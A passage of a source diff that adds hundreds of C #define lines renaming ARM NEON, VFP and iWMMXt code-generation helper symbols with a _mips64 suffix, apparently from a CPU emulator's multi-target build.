gen_helper_neon_fcvt_f16_to_f32_mips64 +#define gen_helper_neon_fcvt_f32_to_f16 gen_helper_neon_fcvt_f32_to_f16_mips64 +#define gen_helper_neon_hadd_s16 gen_helper_neon_hadd_s16_mips64 +#define gen_helper_neon_hadd_s32 gen_helper_neon_hadd_s32_mips64 +#define gen_helper_neon_hadd_s8 gen_helper_neon_hadd_s8_mips64 +#define gen_helper_neon_hadd_u16 gen_helper_neon_hadd_u16_mips64 +#define gen_helper_neon_hadd_u32 gen_helper_neon_hadd_u32_mips64 +#define gen_helper_neon_hadd_u8 gen_helper_neon_hadd_u8_mips64 +#define gen_helper_neon_hsub_s16 gen_helper_neon_hsub_s16_mips64 +#define gen_helper_neon_hsub_s32 gen_helper_neon_hsub_s32_mips64 +#define gen_helper_neon_hsub_s8 gen_helper_neon_hsub_s8_mips64 +#define gen_helper_neon_hsub_u16 gen_helper_neon_hsub_u16_mips64 +#define gen_helper_neon_hsub_u32 gen_helper_neon_hsub_u32_mips64 +#define gen_helper_neon_hsub_u8 gen_helper_neon_hsub_u8_mips64 +#define gen_helper_neon_max_s16 gen_helper_neon_max_s16_mips64 +#define gen_helper_neon_max_s32 gen_helper_neon_max_s32_mips64 +#define gen_helper_neon_max_s8 gen_helper_neon_max_s8_mips64 +#define gen_helper_neon_max_u16 gen_helper_neon_max_u16_mips64 +#define gen_helper_neon_max_u32 gen_helper_neon_max_u32_mips64 +#define gen_helper_neon_max_u8 gen_helper_neon_max_u8_mips64 +#define gen_helper_neon_min_s16 gen_helper_neon_min_s16_mips64 +#define gen_helper_neon_min_s32 gen_helper_neon_min_s32_mips64 +#define gen_helper_neon_min_s8 gen_helper_neon_min_s8_mips64 +#define gen_helper_neon_min_u16 gen_helper_neon_min_u16_mips64 +#define gen_helper_neon_min_u32 gen_helper_neon_min_u32_mips64 +#define gen_helper_neon_min_u8 gen_helper_neon_min_u8_mips64 +#define gen_helper_neon_mull_p8 gen_helper_neon_mull_p8_mips64 +#define gen_helper_neon_mull_s16 gen_helper_neon_mull_s16_mips64 +#define gen_helper_neon_mull_s8 gen_helper_neon_mull_s8_mips64 +#define gen_helper_neon_mull_u16 gen_helper_neon_mull_u16_mips64 +#define gen_helper_neon_mull_u8 gen_helper_neon_mull_u8_mips64 +#define gen_helper_neon_mul_p8 gen_helper_neon_mul_p8_mips64 +#define gen_helper_neon_mul_u16 gen_helper_neon_mul_u16_mips64 +#define gen_helper_neon_mul_u8 gen_helper_neon_mul_u8_mips64 +#define gen_helper_neon_narrow_high_u16 gen_helper_neon_narrow_high_u16_mips64 +#define gen_helper_neon_narrow_high_u8 gen_helper_neon_narrow_high_u8_mips64 +#define gen_helper_neon_narrow_round_high_u16 gen_helper_neon_narrow_round_high_u16_mips64 +#define gen_helper_neon_narrow_round_high_u8 gen_helper_neon_narrow_round_high_u8_mips64 +#define gen_helper_neon_narrow_sat_s16 gen_helper_neon_narrow_sat_s16_mips64 +#define gen_helper_neon_narrow_sat_s32 gen_helper_neon_narrow_sat_s32_mips64 +#define gen_helper_neon_narrow_sat_s8 gen_helper_neon_narrow_sat_s8_mips64 +#define gen_helper_neon_narrow_sat_u16 gen_helper_neon_narrow_sat_u16_mips64 +#define gen_helper_neon_narrow_sat_u32 gen_helper_neon_narrow_sat_u32_mips64 +#define gen_helper_neon_narrow_sat_u8 gen_helper_neon_narrow_sat_u8_mips64 +#define gen_helper_neon_narrow_u16 gen_helper_neon_narrow_u16_mips64 +#define gen_helper_neon_narrow_u8 gen_helper_neon_narrow_u8_mips64 +#define gen_helper_neon_negl_u16 gen_helper_neon_negl_u16_mips64 +#define gen_helper_neon_negl_u32 gen_helper_neon_negl_u32_mips64 +#define gen_helper_neon_paddl_u16 gen_helper_neon_paddl_u16_mips64 +#define gen_helper_neon_paddl_u32 gen_helper_neon_paddl_u32_mips64 +#define gen_helper_neon_padd_u16 gen_helper_neon_padd_u16_mips64 +#define gen_helper_neon_padd_u8 gen_helper_neon_padd_u8_mips64 +#define gen_helper_neon_pmax_s16 gen_helper_neon_pmax_s16_mips64 +#define gen_helper_neon_pmax_s8 gen_helper_neon_pmax_s8_mips64 +#define gen_helper_neon_pmax_u16 gen_helper_neon_pmax_u16_mips64 +#define gen_helper_neon_pmax_u8 gen_helper_neon_pmax_u8_mips64 +#define gen_helper_neon_pmin_s16 gen_helper_neon_pmin_s16_mips64 +#define gen_helper_neon_pmin_s8 gen_helper_neon_pmin_s8_mips64 +#define gen_helper_neon_pmin_u16 gen_helper_neon_pmin_u16_mips64 +#define gen_helper_neon_pmin_u8 gen_helper_neon_pmin_u8_mips64 +#define gen_helper_neon_pmull_64_hi gen_helper_neon_pmull_64_hi_mips64 +#define gen_helper_neon_pmull_64_lo gen_helper_neon_pmull_64_lo_mips64 +#define gen_helper_neon_qabs_s16 gen_helper_neon_qabs_s16_mips64 +#define gen_helper_neon_qabs_s32 gen_helper_neon_qabs_s32_mips64 +#define gen_helper_neon_qabs_s8 gen_helper_neon_qabs_s8_mips64 +#define gen_helper_neon_qadd_s16 gen_helper_neon_qadd_s16_mips64 +#define gen_helper_neon_qadd_s32 gen_helper_neon_qadd_s32_mips64 +#define gen_helper_neon_qadd_s64 gen_helper_neon_qadd_s64_mips64 +#define gen_helper_neon_qadd_s8 gen_helper_neon_qadd_s8_mips64 +#define gen_helper_neon_qadd_u16 gen_helper_neon_qadd_u16_mips64 +#define gen_helper_neon_qadd_u32 gen_helper_neon_qadd_u32_mips64 +#define gen_helper_neon_qadd_u64 gen_helper_neon_qadd_u64_mips64 +#define gen_helper_neon_qadd_u8 gen_helper_neon_qadd_u8_mips64 +#define gen_helper_neon_qdmulh_s16 gen_helper_neon_qdmulh_s16_mips64 +#define gen_helper_neon_qdmulh_s32 gen_helper_neon_qdmulh_s32_mips64 +#define gen_helper_neon_qneg_s16 gen_helper_neon_qneg_s16_mips64 +#define gen_helper_neon_qneg_s32 gen_helper_neon_qneg_s32_mips64 +#define gen_helper_neon_qneg_s8 gen_helper_neon_qneg_s8_mips64 +#define gen_helper_neon_qrdmulh_s16 gen_helper_neon_qrdmulh_s16_mips64 +#define gen_helper_neon_qrdmulh_s32 gen_helper_neon_qrdmulh_s32_mips64 +#define gen_helper_neon_qrshl_s16 gen_helper_neon_qrshl_s16_mips64 +#define gen_helper_neon_qrshl_s32 gen_helper_neon_qrshl_s32_mips64 +#define gen_helper_neon_qrshl_s64 gen_helper_neon_qrshl_s64_mips64 +#define gen_helper_neon_qrshl_s8 gen_helper_neon_qrshl_s8_mips64 +#define gen_helper_neon_qrshl_u16 gen_helper_neon_qrshl_u16_mips64 +#define gen_helper_neon_qrshl_u32 gen_helper_neon_qrshl_u32_mips64 +#define gen_helper_neon_qrshl_u64 gen_helper_neon_qrshl_u64_mips64 +#define gen_helper_neon_qrshl_u8 gen_helper_neon_qrshl_u8_mips64 +#define gen_helper_neon_qshl_s16 gen_helper_neon_qshl_s16_mips64 +#define gen_helper_neon_qshl_s32 gen_helper_neon_qshl_s32_mips64 +#define gen_helper_neon_qshl_s64 gen_helper_neon_qshl_s64_mips64 +#define gen_helper_neon_qshl_s8 gen_helper_neon_qshl_s8_mips64 +#define gen_helper_neon_qshl_u16 gen_helper_neon_qshl_u16_mips64 +#define gen_helper_neon_qshl_u32 gen_helper_neon_qshl_u32_mips64 +#define gen_helper_neon_qshl_u64 gen_helper_neon_qshl_u64_mips64 +#define gen_helper_neon_qshl_u8 gen_helper_neon_qshl_u8_mips64 +#define gen_helper_neon_qshlu_s16 gen_helper_neon_qshlu_s16_mips64 +#define gen_helper_neon_qshlu_s32 gen_helper_neon_qshlu_s32_mips64 +#define gen_helper_neon_qshlu_s64 gen_helper_neon_qshlu_s64_mips64 +#define gen_helper_neon_qshlu_s8 gen_helper_neon_qshlu_s8_mips64 +#define gen_helper_neon_qsub_s16 gen_helper_neon_qsub_s16_mips64 +#define gen_helper_neon_qsub_s32 gen_helper_neon_qsub_s32_mips64 +#define gen_helper_neon_qsub_s64 gen_helper_neon_qsub_s64_mips64 +#define gen_helper_neon_qsub_s8 gen_helper_neon_qsub_s8_mips64 +#define gen_helper_neon_qsub_u16 gen_helper_neon_qsub_u16_mips64 +#define gen_helper_neon_qsub_u32 gen_helper_neon_qsub_u32_mips64 +#define gen_helper_neon_qsub_u64 gen_helper_neon_qsub_u64_mips64 +#define gen_helper_neon_qsub_u8 gen_helper_neon_qsub_u8_mips64 +#define gen_helper_neon_qunzip16 gen_helper_neon_qunzip16_mips64 +#define gen_helper_neon_qunzip32 gen_helper_neon_qunzip32_mips64 +#define gen_helper_neon_qunzip8 gen_helper_neon_qunzip8_mips64 +#define gen_helper_neon_qzip16 gen_helper_neon_qzip16_mips64 +#define gen_helper_neon_qzip32 gen_helper_neon_qzip32_mips64 +#define gen_helper_neon_qzip8 gen_helper_neon_qzip8_mips64 +#define gen_helper_neon_rhadd_s16 gen_helper_neon_rhadd_s16_mips64 +#define gen_helper_neon_rhadd_s32 gen_helper_neon_rhadd_s32_mips64 +#define gen_helper_neon_rhadd_s8 gen_helper_neon_rhadd_s8_mips64 +#define gen_helper_neon_rhadd_u16 gen_helper_neon_rhadd_u16_mips64 +#define gen_helper_neon_rhadd_u32 gen_helper_neon_rhadd_u32_mips64 +#define gen_helper_neon_rhadd_u8 gen_helper_neon_rhadd_u8_mips64 +#define gen_helper_neon_rshl_s16 gen_helper_neon_rshl_s16_mips64 +#define gen_helper_neon_rshl_s32 gen_helper_neon_rshl_s32_mips64 +#define gen_helper_neon_rshl_s64 gen_helper_neon_rshl_s64_mips64 +#define gen_helper_neon_rshl_s8 gen_helper_neon_rshl_s8_mips64 +#define gen_helper_neon_rshl_u16 gen_helper_neon_rshl_u16_mips64 +#define gen_helper_neon_rshl_u32 gen_helper_neon_rshl_u32_mips64 +#define gen_helper_neon_rshl_u64 gen_helper_neon_rshl_u64_mips64 +#define gen_helper_neon_rshl_u8 gen_helper_neon_rshl_u8_mips64 +#define gen_helper_neon_shl_s16 gen_helper_neon_shl_s16_mips64 +#define gen_helper_neon_shl_s32 gen_helper_neon_shl_s32_mips64 +#define gen_helper_neon_shl_s64 gen_helper_neon_shl_s64_mips64 +#define gen_helper_neon_shl_s8 gen_helper_neon_shl_s8_mips64 +#define gen_helper_neon_shl_u16 gen_helper_neon_shl_u16_mips64 +#define gen_helper_neon_shl_u32 gen_helper_neon_shl_u32_mips64 +#define gen_helper_neon_shl_u64 gen_helper_neon_shl_u64_mips64 +#define gen_helper_neon_shl_u8 gen_helper_neon_shl_u8_mips64 +#define gen_helper_neon_subl_u16 gen_helper_neon_subl_u16_mips64 +#define gen_helper_neon_subl_u32 gen_helper_neon_subl_u32_mips64 +#define gen_helper_neon_sub_u16 gen_helper_neon_sub_u16_mips64 +#define gen_helper_neon_sub_u8 gen_helper_neon_sub_u8_mips64 +#define gen_helper_neon_tbl gen_helper_neon_tbl_mips64 +#define gen_helper_neon_tst_u16 gen_helper_neon_tst_u16_mips64 +#define gen_helper_neon_tst_u32 gen_helper_neon_tst_u32_mips64 +#define gen_helper_neon_tst_u8 gen_helper_neon_tst_u8_mips64 +#define gen_helper_neon_unarrow_sat16 gen_helper_neon_unarrow_sat16_mips64 +#define gen_helper_neon_unarrow_sat32 gen_helper_neon_unarrow_sat32_mips64 +#define gen_helper_neon_unarrow_sat8 gen_helper_neon_unarrow_sat8_mips64 +#define gen_helper_neon_unzip16 gen_helper_neon_unzip16_mips64 +#define gen_helper_neon_unzip8 gen_helper_neon_unzip8_mips64 +#define gen_helper_neon_widen_s16 gen_helper_neon_widen_s16_mips64 +#define gen_helper_neon_widen_s8 gen_helper_neon_widen_s8_mips64 +#define gen_helper_neon_widen_u16 gen_helper_neon_widen_u16_mips64 +#define gen_helper_neon_widen_u8 gen_helper_neon_widen_u8_mips64 +#define gen_helper_neon_zip16 gen_helper_neon_zip16_mips64 +#define gen_helper_neon_zip8 gen_helper_neon_zip8_mips64 +#define gen_helper_pre_hvc gen_helper_pre_hvc_mips64 +#define gen_helper_pre_smc gen_helper_pre_smc_mips64 +#define gen_helper_qadd16 gen_helper_qadd16_mips64 +#define gen_helper_qadd8 gen_helper_qadd8_mips64 +#define gen_helper_qaddsubx gen_helper_qaddsubx_mips64 +#define gen_helper_qsub16 gen_helper_qsub16_mips64 +#define gen_helper_qsub8 gen_helper_qsub8_mips64 +#define gen_helper_qsubaddx gen_helper_qsubaddx_mips64 +#define gen_helper_rbit gen_helper_rbit_mips64 +#define gen_helper_recpe_f32 gen_helper_recpe_f32_mips64 +#define gen_helper_recpe_u32 gen_helper_recpe_u32_mips64 +#define gen_helper_recps_f32 gen_helper_recps_f32_mips64 +#define gen_helper_rintd gen_helper_rintd_mips64 +#define gen_helper_rintd_exact gen_helper_rintd_exact_mips64 +#define gen_helper_rints gen_helper_rints_mips64 +#define gen_helper_rints_exact gen_helper_rints_exact_mips64 +#define gen_helper_ror_cc gen_helper_ror_cc_mips64 +#define gen_helper_rsqrte_f32 gen_helper_rsqrte_f32_mips64 +#define gen_helper_rsqrte_u32 gen_helper_rsqrte_u32_mips64 +#define gen_helper_rsqrts_f32 gen_helper_rsqrts_f32_mips64 +#define gen_helper_sadd16 gen_helper_sadd16_mips64 +#define gen_helper_sadd8 gen_helper_sadd8_mips64 +#define gen_helper_saddsubx gen_helper_saddsubx_mips64 +#define gen_helper_sar_cc gen_helper_sar_cc_mips64 +#define gen_helper_sdiv gen_helper_sdiv_mips64 +#define gen_helper_sel_flags gen_helper_sel_flags_mips64 +#define gen_helper_set_cp_reg gen_helper_set_cp_reg_mips64 +#define gen_helper_set_cp_reg64 gen_helper_set_cp_reg64_mips64 +#define gen_helper_set_neon_rmode gen_helper_set_neon_rmode_mips64 +#define gen_helper_set_r13_banked gen_helper_set_r13_banked_mips64 +#define gen_helper_set_rmode gen_helper_set_rmode_mips64 +#define gen_helper_set_user_reg gen_helper_set_user_reg_mips64 +#define gen_helper_shadd16 gen_helper_shadd16_mips64 +#define gen_helper_shadd8 gen_helper_shadd8_mips64 +#define gen_helper_shaddsubx gen_helper_shaddsubx_mips64 +#define gen_helper_shl_cc gen_helper_shl_cc_mips64 +#define gen_helper_shr_cc gen_helper_shr_cc_mips64 +#define gen_helper_shsub16 gen_helper_shsub16_mips64 +#define gen_helper_shsub8 gen_helper_shsub8_mips64 +#define gen_helper_shsubaddx gen_helper_shsubaddx_mips64 +#define gen_helper_ssat gen_helper_ssat_mips64 +#define gen_helper_ssat16 gen_helper_ssat16_mips64 +#define gen_helper_ssub16 gen_helper_ssub16_mips64 +#define gen_helper_ssub8 gen_helper_ssub8_mips64 +#define gen_helper_ssubaddx gen_helper_ssubaddx_mips64 +#define gen_helper_sub_saturate gen_helper_sub_saturate_mips64 +#define gen_helper_sxtb16 gen_helper_sxtb16_mips64 +#define gen_helper_uadd16 gen_helper_uadd16_mips64 +#define gen_helper_uadd8 gen_helper_uadd8_mips64 +#define gen_helper_uaddsubx gen_helper_uaddsubx_mips64 +#define gen_helper_udiv gen_helper_udiv_mips64 +#define gen_helper_uhadd16 gen_helper_uhadd16_mips64 +#define gen_helper_uhadd8 gen_helper_uhadd8_mips64 +#define gen_helper_uhaddsubx gen_helper_uhaddsubx_mips64 +#define gen_helper_uhsub16 gen_helper_uhsub16_mips64 +#define gen_helper_uhsub8 gen_helper_uhsub8_mips64 +#define gen_helper_uhsubaddx gen_helper_uhsubaddx_mips64 +#define gen_helper_uqadd16 gen_helper_uqadd16_mips64 +#define gen_helper_uqadd8 gen_helper_uqadd8_mips64 +#define gen_helper_uqaddsubx gen_helper_uqaddsubx_mips64 +#define gen_helper_uqsub16 gen_helper_uqsub16_mips64 +#define gen_helper_uqsub8 gen_helper_uqsub8_mips64 +#define gen_helper_uqsubaddx gen_helper_uqsubaddx_mips64 +#define gen_helper_usad8 gen_helper_usad8_mips64 +#define gen_helper_usat gen_helper_usat_mips64 +#define gen_helper_usat16 gen_helper_usat16_mips64 +#define gen_helper_usub16 gen_helper_usub16_mips64 +#define gen_helper_usub8 gen_helper_usub8_mips64 +#define gen_helper_usubaddx gen_helper_usubaddx_mips64 +#define gen_helper_uxtb16 gen_helper_uxtb16_mips64 +#define gen_helper_v7m_mrs gen_helper_v7m_mrs_mips64 +#define gen_helper_v7m_msr gen_helper_v7m_msr_mips64 +#define gen_helper_vfp_absd gen_helper_vfp_absd_mips64 +#define gen_helper_vfp_abss gen_helper_vfp_abss_mips64 +#define gen_helper_vfp_addd gen_helper_vfp_addd_mips64 +#define gen_helper_vfp_adds gen_helper_vfp_adds_mips64 +#define gen_helper_vfp_cmpd gen_helper_vfp_cmpd_mips64 +#define gen_helper_vfp_cmped gen_helper_vfp_cmped_mips64 +#define gen_helper_vfp_cmpes gen_helper_vfp_cmpes_mips64 +#define gen_helper_vfp_cmps gen_helper_vfp_cmps_mips64 +#define gen_helper_vfp_divd gen_helper_vfp_divd_mips64 +#define gen_helper_vfp_divs gen_helper_vfp_divs_mips64 +#define gen_helper_vfp_fcvtds gen_helper_vfp_fcvtds_mips64 +#define gen_helper_vfp_fcvt_f16_to_f32 gen_helper_vfp_fcvt_f16_to_f32_mips64 +#define gen_helper_vfp_fcvt_f16_to_f64 gen_helper_vfp_fcvt_f16_to_f64_mips64 +#define gen_helper_vfp_fcvt_f32_to_f16 gen_helper_vfp_fcvt_f32_to_f16_mips64 +#define gen_helper_vfp_fcvt_f64_to_f16 gen_helper_vfp_fcvt_f64_to_f16_mips64 +#define gen_helper_vfp_fcvtsd gen_helper_vfp_fcvtsd_mips64 +#define gen_helper_vfp_get_fpscr gen_helper_vfp_get_fpscr_mips64 +#define gen_helper_vfp_maxnumd gen_helper_vfp_maxnumd_mips64 +#define gen_helper_vfp_maxnums gen_helper_vfp_maxnums_mips64 +#define gen_helper_vfp_maxs gen_helper_vfp_maxs_mips64 +#define gen_helper_vfp_minnumd gen_helper_vfp_minnumd_mips64 +#define gen_helper_vfp_minnums gen_helper_vfp_minnums_mips64 +#define gen_helper_vfp_mins gen_helper_vfp_mins_mips64 +#define gen_helper_vfp_muladdd gen_helper_vfp_muladdd_mips64 +#define gen_helper_vfp_muladds gen_helper_vfp_muladds_mips64 +#define gen_helper_vfp_muld gen_helper_vfp_muld_mips64 +#define gen_helper_vfp_muls gen_helper_vfp_muls_mips64 +#define gen_helper_vfp_negd gen_helper_vfp_negd_mips64 +#define gen_helper_vfp_negs gen_helper_vfp_negs_mips64 +#define gen_helper_vfp_set_fpscr gen_helper_vfp_set_fpscr_mips64 +#define gen_helper_vfp_shtod gen_helper_vfp_shtod_mips64 +#define gen_helper_vfp_shtos gen_helper_vfp_shtos_mips64 +#define gen_helper_vfp_sitod gen_helper_vfp_sitod_mips64 +#define gen_helper_vfp_sitos gen_helper_vfp_sitos_mips64 +#define gen_helper_vfp_sltod gen_helper_vfp_sltod_mips64 +#define gen_helper_vfp_sltos gen_helper_vfp_sltos_mips64 +#define gen_helper_vfp_sqrtd gen_helper_vfp_sqrtd_mips64 +#define gen_helper_vfp_sqrts gen_helper_vfp_sqrts_mips64 +#define gen_helper_vfp_subd gen_helper_vfp_subd_mips64 +#define gen_helper_vfp_subs gen_helper_vfp_subs_mips64 +#define gen_helper_vfp_toshd_round_to_zero gen_helper_vfp_toshd_round_to_zero_mips64 +#define gen_helper_vfp_toshs_round_to_zero gen_helper_vfp_toshs_round_to_zero_mips64 +#define gen_helper_vfp_tosid gen_helper_vfp_tosid_mips64 +#define gen_helper_vfp_tosis gen_helper_vfp_tosis_mips64 +#define gen_helper_vfp_tosizd gen_helper_vfp_tosizd_mips64 +#define gen_helper_vfp_tosizs gen_helper_vfp_tosizs_mips64 +#define gen_helper_vfp_tosld gen_helper_vfp_tosld_mips64 +#define gen_helper_vfp_tosld_round_to_zero gen_helper_vfp_tosld_round_to_zero_mips64 +#define gen_helper_vfp_tosls gen_helper_vfp_tosls_mips64 +#define gen_helper_vfp_tosls_round_to_zero gen_helper_vfp_tosls_round_to_zero_mips64 +#define gen_helper_vfp_touhd_round_to_zero gen_helper_vfp_touhd_round_to_zero_mips64 +#define gen_helper_vfp_touhs_round_to_zero gen_helper_vfp_touhs_round_to_zero_mips64 +#define gen_helper_vfp_touid gen_helper_vfp_touid_mips64 +#define gen_helper_vfp_touis gen_helper_vfp_touis_mips64 +#define gen_helper_vfp_touizd gen_helper_vfp_touizd_mips64 +#define gen_helper_vfp_touizs gen_helper_vfp_touizs_mips64 +#define gen_helper_vfp_tould gen_helper_vfp_tould_mips64 +#define gen_helper_vfp_tould_round_to_zero gen_helper_vfp_tould_round_to_zero_mips64 +#define gen_helper_vfp_touls gen_helper_vfp_touls_mips64 +#define gen_helper_vfp_touls_round_to_zero gen_helper_vfp_touls_round_to_zero_mips64 +#define gen_helper_vfp_uhtod gen_helper_vfp_uhtod_mips64 +#define gen_helper_vfp_uhtos gen_helper_vfp_uhtos_mips64 +#define gen_helper_vfp_uitod gen_helper_vfp_uitod_mips64 +#define gen_helper_vfp_uitos gen_helper_vfp_uitos_mips64 +#define gen_helper_vfp_ultod gen_helper_vfp_ultod_mips64 +#define gen_helper_vfp_ultos gen_helper_vfp_ultos_mips64 +#define gen_helper_wfe gen_helper_wfe_mips64 +#define gen_helper_wfi gen_helper_wfi_mips64 +#define gen_hvc gen_hvc_mips64 +#define gen_intermediate_code_internal gen_intermediate_code_internal_mips64 +#define gen_intermediate_code_internal_a64 gen_intermediate_code_internal_a64_mips64 +#define gen_iwmmxt_address gen_iwmmxt_address_mips64 +#define gen_iwmmxt_shift gen_iwmmxt_shift_mips64 +#define gen_jmp gen_jmp_mips64 +#define gen_load_and_replicate gen_load_and_replicate_mips64 +#define gen_load_exclusive gen_load_exclusive_mips64 +#define gen_logic_CC gen_logic_CC_mips64 +#define gen_logicq_cc gen_logicq_cc_mips64 +#define gen_lookup_tb gen_lookup_tb_mips64 +#define gen_mov_F0_vreg gen_mov_F0_vreg_mips64 +#define gen_mov_F1_vreg gen_mov_F1_vreg_mips64 +#define gen_mov_vreg_F0 gen_mov_vreg_F0_mips64 +#define gen_muls_i64_i32 gen_muls_i64_i32_mips64 +#define gen_mulu_i64_i32 gen_mulu_i64_i32_mips64 +#define gen_mulxy gen_mulxy_mips64 +#define gen_neon_add gen_neon_add_mips64 +#define gen_neon_addl gen_neon_addl_mips64 +#define gen_neon_addl_saturate gen_neon_addl_saturate_mips64 +#define gen_neon_bsl gen_neon_bsl_mips64 +#define gen_neon_dup_high16 gen_neon_dup_high16_mips64 +#define gen_neon_dup_low16 gen_neon_dup_low16_mips64 +#define gen_neon_dup_u8 gen_neon_dup_u8_mips64 +#define gen_neon_mull gen_neon_mull_mips64 +#define gen_neon_narrow gen_neon_narrow_mips64 +#define gen_neon_narrow_op gen_neon_narrow_op_mips64 +#define gen_neon_narrow_sats gen_neon_narrow_sats_mips64 +#define gen_neon_narrow_satu gen_neon_narrow_satu_mips64 +#define gen_neon_negl gen_neon_negl_mips64 +#define gen_neon_rsb gen_neon_rsb_mips64 +#define gen_neon_shift_narrow gen_neon_shift_narrow_mips64 +#define gen_neon_subl gen_neon_subl_mips64 +#define gen_neon_trn_u16 gen_neon_trn_u16_mips64 +#define gen_neon_trn_u8 gen_neon_trn_u8_mips64 +#define gen_neon_unarrow_sats gen_neon_unarrow_sats_mips64 +#define gen_neon_unzip gen_neon_unzip_mips64 +#define gen_neon_widen gen_neon_widen_mips64 +#define gen_neon_zip gen_neon_zip_mips64 +#define gen_new_label gen_new_label_mips64 +#define gen_nop_hint gen_nop_hint_mips64 +#define gen_op_iwmmxt_addl_M0_wRn gen_op_iwmmxt_addl_M0_wRn_mips64 +#define gen_op_iwmmxt_addnb_M0_wRn gen_op_iwmmxt_addnb_M0_wRn_mips64 +#define gen_op_iwmmxt_addnl_M0_wRn gen_op_iwmmxt_addnl_M0_wRn_mips64 +#define gen_op_iwmmxt_addnw_M0_wRn gen_op_iwmmxt_addnw_M0_wRn_mips64 +#define gen_op_iwmmxt_addsb_M0_wRn gen_op_iwmmxt_addsb_M0_wRn_mips64 +#define gen_op_iwmmxt_addsl_M0_wRn gen_op_iwmmxt_addsl_M0_wRn_mips64 +#define gen_op_iwmmxt_addsw_M0_wRn gen_op_iwmmxt_addsw_M0_wRn_mips64 +#define gen_op_iwmmxt_addub_M0_wRn gen_op_iwmmxt_addub_M0_wRn_mips64 +#define gen_op_iwmmxt_addul_M0_wRn gen_op_iwmmxt_addul_M0_wRn_mips64 +#define gen_op_iwmmxt_adduw_M0_wRn gen_op_iwmmxt_adduw_M0_wRn_mips64 +#define gen_op_iwmmxt_andq_M0_wRn gen_op_iwmmxt_andq_M0_wRn_mips64 +#define gen_op_iwmmxt_avgb0_M0_wRn gen_op_iwmmxt_avgb0_M0_wRn_mips64 +#define gen_op_iwmmxt_avgb1_M0_wRn gen_op_iwmmxt_avgb1_M0_wRn_mips64 +#define gen_op_iwmmxt_avgw0_M0_wRn gen_op_iwmmxt_avgw0_M0_wRn_mips64 +#define gen_op_iwmmxt_avgw1_M0_wRn gen_op_iwmmxt_avgw1_M0_wRn_mips64 +#define gen_op_iwmmxt_cmpeqb_M0_wRn gen_op_iwmmxt_cmpeqb_M0_wRn_mips64 +#define gen_op_iwmmxt_cmpeql_M0_wRn gen_op_iwmmxt_cmpeql_M0_wRn_mips64 +#define gen_op_iwmmxt_cmpeqw_M0_wRn gen_op_iwmmxt_cmpeqw_M0_wRn_mips64 +#define gen_op_iwmmxt_cmpgtsb_M0_wRn gen_op_iwmmxt_cmpgtsb_M0_wRn_mips64 +#define gen_op_iwmmxt_cmpgtsl_M0_wRn gen_op_iwmmxt_cmpgtsl_M0_wRn_mips64 +#define gen_op_iwmmxt_cmpgtsw_M0_wRn gen_op_iwmmxt_cmpgtsw_M0_wRn_mips64 +#define gen_op_iwmmxt_cmpgtub_M0_wRn gen_op_iwmmxt_cmpgtub_M0_wRn_mips64 +#define gen_op_iwmmxt_cmpgtul_M0_wRn gen_op_iwmmxt_cmpgtul_M0_wRn_mips64 +#define gen_op_iwmmxt_cmpgtuw_M0_wRn gen_op_iwmmxt_cmpgtuw_M0_wRn_mips64 +#define gen_op_iwmmxt_macsw_M0_wRn gen_op_iwmmxt_macsw_M0_wRn_mips64 +#define gen_op_iwmmxt_macuw_M0_wRn gen_op_iwmmxt_macuw_M0_wRn_mips64 +#define gen_op_iwmmxt_maddsq_M0_wRn gen_op_iwmmxt_maddsq_M0_wRn_mips64 +#define gen_op_iwmmxt_madduq_M0_wRn gen_op_iwmmxt_madduq_M0_wRn_mips64 +#define gen_op_iwmmxt_maxsb_M0_wRn gen_op_iwmmxt_maxsb_M0_wRn_mips64 +#define gen_op_iwmmxt_maxsl_M0_wRn gen_op_iwmmxt_maxsl_M0_wRn_mips64 +#define gen_op_iwmmxt_maxsw_M0_wRn gen_op_iwmmxt_maxsw_M0_wRn_mips64 +#define gen_op_iwmmxt_maxub_M0_wRn gen_op_iwmmxt_maxub_M0_wRn_mips64 +#define gen_op_iwmmxt_maxul_M0_wRn gen_op_iwmmxt_maxul_M0_wRn_mips64 +#define gen_op_iwmmxt_maxuw_M0_wRn gen_op_iwmmxt_maxuw_M0_wRn_mips64 +#define gen_op_iwmmxt_minsb_M0_wRn gen_op_iwmmxt_minsb_M0_wRn_mips64 +#define gen_op_iwmmxt_minsl_M0_wRn gen_op_iwmmxt_minsl_M0_wRn_mips64 +#define gen_op_iwmmxt_minsw_M0_wRn gen_op_iwmmxt_minsw_M0_wRn_mips64 +#define gen_op_iwmmxt_minub_M0_wRn gen_op_iwmmxt_minub_M0_wRn_mips64 +#define gen_op_iwmmxt_minul_M0_wRn gen_op_iwmmxt_minul_M0_wRn_mips64 +#define gen_op_iwmmxt_minuw_M0_wRn gen_op_iwmmxt_minuw_M0_wRn_mips64 +#define gen_op_iwmmxt_movq_M0_wRn gen_op_iwmmxt_movq_M0_wRn_mips64 +#define gen_op_iwmmxt_movq_wRn_M0 gen_op_iwmmxt_movq_wRn_M0_mips64 +#define gen_op_iwmmxt_mulshw_M0_wRn gen_op_iwmmxt_mulshw_M0_wRn_mips64 +#define gen_op_iwmmxt_mulslw_M0_wRn gen_op_iwmmxt_mulslw_M0_wRn_mips64 +#define gen_op_iwmmxt_muluhw_M0_wRn gen_op_iwmmxt_muluhw_M0_wRn_mips64 +#define gen_op_iwmmxt_mululw_M0_wRn gen_op_iwmmxt_mululw_M0_wRn_mips64 +#define gen_op_iwmmxt_orq_M0_wRn gen_op_iwmmxt_orq_M0_wRn_mips64 +#define gen_op_iwmmxt_packsl_M0_wRn gen_op_iwmmxt_packsl_M0_wRn_mips64 +#define gen_op_iwmmxt_packsq_M0_wRn gen_op_iwmmxt_packsq_M0_wRn_mips64 +#define gen_op_iwmmxt_packsw_M0_wRn gen_op_iwmmxt_packsw_M0_wRn_mips64 +#define gen_op_iwmmxt_packul_M0_wRn gen_op_iwmmxt_packul_M0_wRn_mips64 +#define gen_op_iwmmxt_packuq_M0_wRn gen_op_iwmmxt_packuq_M0_wRn_mips64 +#define gen_op_iwmmxt_packuw_M0_wRn gen_op_iwmmxt_packuw_M0_wRn_mips64 +#define gen_op_iwmmxt_sadb_M0_wRn gen_op_iwmmxt_sadb_M0_wRn_mips64 +#define gen_op_iwmmxt_sadw_M0_wRn gen_op_iwmmxt_sadw_M0_wRn_mips64 +#define gen_op_iwmmxt_set_cup gen_op_iwmmxt_set_cup_mips64 +#define gen_op_iwmmxt_set_mup gen_op_iwmmxt_set_mup_mips64 +#define gen_op_iwmmxt_setpsr_nz gen_op_iwmmxt_setpsr_nz_mips64 +#define gen_op_iwmmxt_subnb_M0_wRn gen_op_iwmmxt_subnb_M0_wRn_mips64 +#define gen_op_iwmmxt_subnl_M0_wRn 